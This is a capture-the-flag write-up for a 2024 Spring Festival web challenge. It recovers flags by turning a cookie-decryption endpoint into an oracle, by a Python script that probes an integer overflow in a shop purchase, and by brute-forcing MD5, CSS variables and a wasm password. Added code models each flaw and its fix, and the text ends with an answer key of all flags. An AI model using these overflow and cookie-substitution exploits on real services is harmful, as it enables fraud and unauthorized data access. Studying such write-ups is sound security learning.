[Spring Festival 2024] Red-Envelope Challenge Write-up, Problems 8~10 (Web)
Write-up
https://www.bilibili.com/video/BV1ap421R7VS/
A few URLs are easy to obtain from the video:
QR code
https://2024challenge.52pojie.cn/
Project repository
https://github.com/ganlvtech/52pojie-2024-challenge
flagA
https://2024challenge.52pojie.cn/index.html
https://2024challenge.52pojie.cn/auth/login
HTTP/1.1 302 Found
Date: Wed, 21 Feb 2024 18:44:54 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: wzws_sessionid=gDI3LjE1NC4yMDMuOTeCZjkyZGJjoGXWRKaBYzEzNjll; Path=/; HttpOnly
Location: /
Set-Cookie: uid=2KFwj6jFf44dKlXDB+Ti88nMbWFkPXRXHFga9LtUy7ChNg==; path=/; SameSite=Lax
Set-Cookie: flagA=L6Sv7Og44YdiI+gNpgm9YF5sWDCoAa4OYlnM9AKsTQHrjEZ54tPcYWx12Q==; expires=Wed, 21 Feb 2024 18:50:00 GMT; path=/; SameSite=Lax
WZWS-RAY: 1139-1708569894.388-s4jhg
HTTP/1.1 302 Found
Date: Wed, 21 Feb 2024 19:14:08 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: wzws_sessionid=gDI3LjE1NC4yMDMuOTegZdZLgIFjMTM2OWWCZjkyZGJj; Path=/; HttpOnly
Location: /
Set-Cookie: uid=UUt56zJRESolKTW0ORX2PqGHYM3KB/J7eherP4nANd0yvA==; path=/; SameSite=Lax
Set-Cookie: flagA=RB7TyehutV08nZaXMaQADZx8WIwXjwmJkQtHqVnFjIKBNNSwGgAx7idYJg==; expires=Wed, 21 Feb 2024 19:20:00 GMT; path=/; SameSite=Lax
WZWS-RAY: 1139-1708571648.108-s5jhg
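The encryption is dynamic. My blind guess is RSA, so brute force is certainly out. I guessed at how the https://2024challenge.52pojie.cn/auth/uid endpoint decrypts uid and found that the result depends only on the uid cookie, so I replaced the uid value with the flagA value (quite a leap of imagination).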
flagA{e3cadceb}
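Here the https://2024challenge.52pojie.cn/auth/uid endpoint effectively serves as the decryption interface for this 2024 challenge: it reveals all the encrypted data cached in cookies, for example game2048_user_data.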
game2048_user_data
NtDDJugdK6TKcTmcBCnYLkelVZWMLEArgd8fsJELNZWRwJERBE9rcy9IpXysY8b4qUgdo4reIaMkT0hlKjw3/gXty+q1qx1PjxR8z3KEqsVwF2YBk8tEPnsEAsABb0sj7DforzjCJ7oAjHq4il1IZ76FFBz5jNVTT4legOKoM64=;
{"game_data":{"tiles":[2,4,2,4,4,256,32,2,8,32,2,512,16,128,4,128],"score":7572},"money_count":8194}
3+WawrjedRnS42J4x3aEDQ/whnHbIHSGbWhq3C/Vg2HBwlqCAvxreT5n2LM96ZVVQ/UCPO2QaF9TKMQiRxD5AKcaJiiuf304Fxzs3oJR03z76AYYC6xcTEZMBeBxn4t8dikJkRW+zFg=
{"game_data":{"tiles":[0,0,0,0,0,0,2,0,0,0,0,0,0,2,0,0]},"money_count":7994}
Jz0gXDjJG+a1gpE1Z70m7PibK246/vtXKKMPXOfAUaHp02uCZdhwKShsHKoVVDnOO3lpN4B5qFEYmU2xRbrM1Ct1j4Tr6MoQEXyl+JloyuTHimkF/g==
{"game_data":{"tiles":[0,0,0,0,0,0,0,0,2,0,0,0,0,2,0,0]}}
Oqgi98bM7Ce0E2e4n74FX9jStsvbVMkss76cfWx3ge6n5VKg7ajCMZqgp/5MWvtB8bJ/TrJkMl/R5Yg2tdRZ9YF79hRTrMSRy312GLKwgHYMKvrPj94ERE6P7Zvcw+HoROtYvlv1b2VG4xU304p6LHsuYeyc8PLO39V4dN4pZfctGsyT5bOn5Sf7Hw==
{"game_data":{"tiles":[0,0,0,2,0,0,0,0,0,0,2,4,0,4,8,64],"score":332},"money_count":282,"double_money_count":1}
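The cookie substitution above works because every cookie is sealed the same way and nothing ties a ciphertext to the cookie it was issued for. The following is an added example, not the challenge's server code: it models the /auth/uid endpoint with and without the cookie name bound in as authenticated data. The key, the uid value, the flag string and the HMAC-based cipher (a standard-library stand-in for a real AEAD) are all constructed assumptions.

```python
import base64, hashlib, hmac, os

KEY = os.urandom(32)  # constructed server-side key, shared by every cookie

def _mac(aad, nonce, ct):
    msg = len(aad).to_bytes(2, "big") + aad + nonce + ct
    return hmac.new(KEY, b"mac" + msg, hashlib.sha256).digest()[:16]

def _xor_stream(nonce, data):
    # HMAC-SHA256 in counter mode as keystream; stdlib stand-in for a real AEAD
    out = bytearray()
    for off in range(0, len(data), 32):
        block = hmac.new(KEY, b"enc" + nonce + off.to_bytes(4, "big"),
                         hashlib.sha256).digest()
        out += bytes(a ^ b for a, b in zip(data[off:off + 32], block))
    return bytes(out)

def seal(value, aad=b""):
    nonce = os.urandom(12)
    ct = _xor_stream(nonce, value.encode())
    return base64.b64encode(nonce + ct + _mac(aad, nonce, ct)).decode()

def unseal(cookie, aad=b""):
    raw = base64.b64decode(cookie)
    nonce, ct, tag = raw[:12], raw[12:-16], raw[-16:]
    if not hmac.compare_digest(tag, _mac(aad, nonce, ct)):
        raise ValueError("cookie rejected")
    return _xor_stream(nonce, ct).decode()

def login(bind_name):
    # Issue both cookies; bind_name=True authenticates the cookie name too
    values = {"uid": "10001", "flagA": "flagA{constructed}"}
    return {n: seal(v, n.encode() if bind_name else b"")
            for n, v in values.items()}

def auth_uid(cookies, bind_name):
    # Model of /auth/uid: decrypt whatever sits in the uid cookie and echo it
    return unseal(cookies["uid"], b"uid" if bind_name else b"")

def swap_result(bind_name):
    cookies = login(bind_name)
    cookies["uid"] = cookies["flagA"]  # the substitution described above
    try:
        return auth_uid(cookies, bind_name)
    except ValueError as err:
        return str(err)

if __name__ == "__main__":
    print("unbound:", swap_result(False))  # endpoint acts as a decryption oracle
    print("bound:  ", swap_result(True))   # swapped cookie fails authentication
```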
flagB
https://2024challenge.52pojie.cn/flagB/index.html
From the page script flagB.js, the 2048 game is played by calling back-end endpoints, which earns points.
// Start a game
const get_info = () => request('/flagB/info');
// Restart
const restart = () => request('/flagB/restart', {method: 'POST'});
// Move: MOVE_UP-1 MOVE_DOWN-2 MOVE_LEFT-3 MOVE_RIGHT-4
const move = (direction) => request('/flagB/move', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: `direction=${encodeURIComponent(direction)}`});
// Get shop information
const get_shop = () => request('/flagB/shop');
// Buy an item
const buy_item = (shop_item_id, buy_count) => request('/flagB/buy_item', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: `shop_item_id=${encodeURIComponent(shop_item_id)}&buy_count=${encodeURIComponent(buy_count)}`});
// Use an item
const use_item = (item_id) => request('/flagB/use_item', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: `item_id=${encodeURIComponent(item_id)}`});
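With no clear approach, I looked at the network traffic and saw that the Set-Cookie value game2048_user_data keeps changing. Replaying an old cookie showed that the game data is stored directly in game2048_user_data. Recover the encryption key? Not realistic (later, while solving flag2, I found out it is RSA, so forget about reversing it, hahaha).
Entering a quantity of 50000000000 when buying flagB triggers an overflow, so I brought out Python to probe the coin limit.
2^63-1 = 9223372036854775807
The maximum value of a Long.
The server returns one of two messages:
// 购买商品之后钱怎么还变多了?不知道出什么 bug 了,暂时先拦一下 ^_^ ("How did the money go up after buying an item? No idea what bug this is, blocking it for now ^_^")
// 钱不够 ("Not enough money")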
import requests

ck = "wzws_sessionid=gmY5MmRiY6Bl1qBhgDI3LjE1NC4yMDIuMTgzgTlmZWE3MA==; uid=RReWEcPoCdv7reT42vzFbfliVdI8x0c61RdIQCsx24eidQ==; game2048_user_data=MhXwAjipQS7eWkuF0RYS6I0IoebonNW8B4Is04IblIoO0gCC3PljSd4LhpWaur8tAwJQAJwi3lKO0N3bnmg6O22er6kyQHjUH2HYBYMkKW1TW+rVavpD9vEvtRKXQliB+VKzpmlm95eRf7pgLkututvICfgH+ozWBpbRP9noYGmkrVbA4foeUogAAJAp9TH8IQ=="
session = requests.session()
headers = {
    "Host": "2024challenge.52pojie.cn",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate, br",
    "Referer": "https://2024challenge.52pojie.cn/flagB/index.html",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "https://2024challenge.52pojie.cn",
    "Connection": "keep-alive",
    "Cookie": ck,
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"
}


def get_headers(_ck):
    # Copy the base headers and set the Cookie header to the given cookie string
    # (appending it to the existing value would send every cookie twice)
    _headers = headers.copy()
    _headers["Cookie"] = _ck
    return _headers


def buy_item(shop_item_id, buy_count):
    _data = {}
    try:
        url = "https://2024challenge.52pojie.cn/flagB/buy_item"
        data = {
            "shop_item_id": shop_item_id,
            "buy_count": buy_count
        }
        response = session.post(url, headers=get_headers(ck), data=data)
        _data = response.json()
        if _data["code"] == 0:
            print("购买成功", shop_item_id, buy_count)
            return _data
        # if "msg" in _data:
        #     print(_data["msg"])
        #     toView(_data)
        return _data
    except Exception as e:
        # Network or JSON error: report it and let the caller skip this attempt
        print(e, _data)
        return None


# buy_item("5", num)["code"] == 0 means the purchase succeeded; anything else is a failure
# There are two failure messages:
# 钱不够 ("not enough money") means too few coins
# 购买商品之后钱怎么还变多了?不知道出什么 bug 了,暂时先拦一下 ^_^ means the overflow was triggered
# We need a value between "overflow" and "not enough money" that buys successfully
# Since it is an overflow, go straight to 2^n
for i in range(10, 65):
    rs = buy_item("5", str(2**i))
    # rs is None when the request failed, so check it before reading "code"
    if rs and rs.get("code") == 0:
        print("购买成功, [ 2^", i, "] ", str(2**i))
# 购买成功, [ 2^ 62 ] 4611686018427387904
flagB{f382d735}
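Why a single power of two slips between the two error messages, as an added example that is not the challenge's server code: it assumes the shop computes price * count in wrapping signed 64-bit arithmetic and then applies the two checks whose messages are quoted above. PRICE is a hypothetical value chosen as 4 times an odd number, so the product wraps to exactly 0 at 2^62; the checked variant shows the validation that closes the gap.

```python
I64_MAX = (1 << 63) - 1  # 9223372036854775807, the limit quoted above

def wrap_i64(x):
    # Reduce an unbounded Python int to two's-complement signed 64-bit
    x &= (1 << 64) - 1
    return x - (1 << 64) if x > I64_MAX else x

def buy_wrapping(money, price, count):
    # Assumed model of the shop: the multiplication silently wraps at 64 bits
    cost = wrap_i64(price * count)
    remaining = wrap_i64(money - cost)
    if remaining < 0:
        return "not enough money"
    if remaining > money:
        return "money increased"  # the guard message quoted above
    return "ok"                   # reached when the cost wrapped to 0

def buy_checked(money, price, count):
    # Hardened variant: reject quantities whose total leaves the i64 range
    if count <= 0 or price * count > I64_MAX:
        return "invalid quantity"
    if price * count > money:
        return "not enough money"
    return "ok"

def scan(buy, money, price):
    # Same probe as the loop above; 2^63 and up do not fit a signed 64-bit count
    return [i for i in range(10, 63) if buy(money, price, 1 << i) == "ok"]

PRICE = 1_000_000_004  # hypothetical price, 4 * 250000001 (odd)
MONEY = 8194           # money_count from the decrypted cookie shown earlier

if __name__ == "__main__":
    print(buy_wrapping(MONEY, PRICE, 50_000_000_000))  # overflow guard fires
    print(scan(buy_wrapping, MONEY, PRICE))            # exponents accepted
    print(scan(buy_checked, MONEY, PRICE))             # nothing accepted
```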
flagC
https://2024challenge.52pojie.cn/flagC/index.html
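Construct images for it to guess; the flag must be in the /flagC/verify endpoint.
document.querySelector('#result').textContent = hint; // shows a hint on a wrong answer, the flag on a correct one
Brute force? Why is it brute force every single day!!! Hahaha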
flag1
flag1{52pj2024}
flag2
Hidden really deep.
flag2{xHOpRP}
flag3
Read by eye from the static (snow) screen.
flag3{GRsgk2}
flag4 & 5 & 9 & 10
https://2024challenge.52pojie.cn/flag4_flag10.png
flag4{YvJZNS}
flag5{P3prqF}
flag9{KHTALK}
I could not see flag10 in this image, but the file name includes it, so my blind guess is steganography; time for the tool Stegsolve.jar.
java -jar ./Stegsolve.jar
flag10{6BxMkW}
flag6
https://2024challenge.52pojie.cn/flag6/index.html
document.querySelector('button').addEventListener('click', () => {
    const t0 = Date.now();
    for (let i = 0; i < 1e8; i++) {
        if ((i & 0x1ffff) === 0x1ffff) {
            const progress = i / 1e8;
            const t = Date.now() - t0;
            console.log(`${(progress * 100).toFixed(2)}% ${Math.floor(t / 1000)}s ETA:${Math.floor(t / progress / 1000)}s`);
        }
        if (MD5(String(i)) === '1c450bbafad15ad87c32831fa1a616fc') {
            document.querySelector('#result').textContent = `flag6{${i}}`;
            break;
        }
    }
});
//flag6{20240217}
flag7
https://github.com/ganlvtech/52pojie-2024-challenge
One of the commits removes flag content that was committed by accident.
There is also a new video, 吾爱破解2024年春节解题红包视频.mp4.
flag8
Shown when buying an item in flagB.
flag8{OaOjIK}
flag11
https://2024challenge.52pojie.cn/flag11/index.html
Jigsaw puzzle
<html>
<head>
<style>
:root {
--var1: 0; /* find a suitable value in the range 0 ~ 100 */
--var2: 0; /* find a suitable value in the range 0 ~ 100 */
}
#a000 {
position: absolute;
left: 0;
top: 0;
width: 30px;
height: 30px;
background: url(flag11.png) 0px 0px;
transform: translate(calc(942.5135817416999px + 1.0215884355337748px * var(--var1) + 0.24768196677010001px * var(--var2)), calc(224.16483995058888px + 2.9293942195858147px * var(--var1) + 0.8924085229409133px * var(--var2)));
}
</style>
</head>
<body>
<div>
<div id="a000"></div>
<div id="a319"></div>
</div>
</body>
</html>
It is only 100*100, so just brute-force it.
const root = document.documentElement;
let i = 0;
let j = 0;
function updateValues() {
    root.style.setProperty('--var1', i);
    root.style.setProperty('--var2', j);
    console.log("i: " + i + ", j: " + j);
    j++; // advance j
    if (j === 100) {
        j = 0;
        i++; // advance i
    }
    if (i === 100) {
        clearInterval(interval); // stop the timer once i reaches 100
    }
}
let interval = setInterval(updateValues, 50);
// Answer (set directly, so it does not redeclare i and j from the search above)
document.documentElement.style.setProperty('--var1', 71);
document.documentElement.style.setProperty('--var2', 20);
flag12
https://2024challenge.52pojie.cn/flag12/index.html
https://2024challenge.52pojie.cn/flag12/flag12.wasm
Brute force?
// Password range: 0 ~ 4294967295
const get_flag = (secret) => {
    let num = instance.exports.get_flag12(secret);
    let str = '';
    while (num > 0) {
        str = String.fromCodePoint(num & 0xff) + str;
        num >>= 8;
    }
    //console.log(str)
    // Throw on the first non-empty result so the loop stops and the console shows it
    if (str.length > 0) throw Error(str)
    //return `flag12{${str}}`;
}
for (let i = 0; i <= 4294967295; i++) {
    get_flag(i)
}
<meta charset="UTF-8">
<div>输入密码获取 flag12 (密码范围: 0 ~ 4294967295): <input type="text"><button>获取 flag12</button></div>
<div id="result"></div>
<script>
WebAssembly.instantiateStreaming(fetch('flag12.wasm'))
.then(({instance}) => {
const get_flag = (secret) => {
let num = instance.exports.get_flag12(secret);
let str = '';
while (num > 0) {
str = String.fromCodePoint(num & 0xff) + str;
num >>= 8;
}
//console.log(str)
if(str.length>0) throw Error(str)
//return `flag12{${str}}`;
}
document.querySelector('button').addEventListener('click', (e) => {
for (let i = 0; i <= 4294967295; i++) {
get_flag(i)
}
e.preventDefault();
document.querySelector('#result').textContent = get_flag12(parseInt(document.querySelector('input').value));
});
});
</script>
//index.html:15 Uncaught Error: HOXI
Summary
flagA{e3cadceb}
flagB{f382d735}
flagC{d466f41e}
flag1{52pj2024}
flag2{xHOpRP}
flag3{GRsgk2}
flag4{YvJZNS}
flag5{P3prqF}
flag6{20240217}
flag7{Djl9NQ}
flag8{OaOjIK}
flag9{KHTALK}
flag10{6BxMkW}
flag11{HPQfVF}
flag12{HOXI}
# flagA, flagB and flagC are time-limited, so fetch them right when they are needed
flag1{52pj2024} flag2{xHOpRP} flag3{GRsgk2} flag4{YvJZNS} flag5{P3prqF} flagA{e3cadceb}
flag5{P3prqF} flag6{20240217} flag7{Djl9NQ} flag8{OaOjIK} flagB{f382d735}
flag9{KHTALK} flag10{6BxMkW} flag11{HPQfVF} flag12{HOXI} flagC{d466f41e}